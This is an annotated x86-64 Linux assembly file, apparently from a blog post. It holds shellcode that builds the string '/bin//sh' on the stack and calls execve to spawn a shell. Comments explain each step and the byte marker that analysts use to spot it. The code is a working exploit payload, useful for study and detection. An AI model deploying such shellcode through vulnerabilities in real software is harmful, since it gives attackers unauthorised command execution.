# http://a41l4.blogspot.com.es/2017/01/execvestack1434.html
#
# Target:  Linux x86-64, GAS AT&T syntax (op src, dst).
# Effect:  execve("/bin//sh", NULL, NULL) through the raw syscall interface.
# Syscall: rax = 0x3b (execve), rdi = path, rsi = argv, rdx = envp.
# Stack:   two 8-byte pushes build the path string; nothing is popped back.
# Notes:   - No instruction after `syscall`: if execve fails, execution runs
#            on into whatever bytes follow this code.
#          - argv = NULL is tolerated by Linux but is not portable; newer
#            kernels may substitute an empty argv[0] (confirm on the target).
#          - When reviewing captured payloads, the 8-byte immediate below
#            (ASCII "/bin//sh" stored little-endian) is an easy marker.

        .text
        .globl  _start
_start:
        # esi = 0; writing the 32-bit register also clears the top of rsi.
        xorl    %esi, %esi              # rsi = argv = NULL
        # edx:eax = eax * esi = 0, so rax and rdx are zeroed in one step.
        mull    %esi                    # rax = 0, rdx = envp = NULL

        # Build the path on the stack: terminator first, then the 8 characters.
        pushq   %rax                    # 8 zero bytes -> NUL terminator
        # The doubled slash pads the path to exactly 8 bytes, so it fills one
        # 64-bit immediate; in memory the bytes read '/bin//sh' in order.
        movabsq $0x68732f2f6e69622f, %rbx
        pushq   %rbx                    # rsp now points at "/bin//sh\0"

        # Copy rsp into rdi via the stack.
        pushq   %rsp
        popq    %rdi                    # rdi = path

        # rax is still 0 from the mull, so setting al alone gives rax = 0x3b.
        movb    $0x3b, %al              # execve
        syscall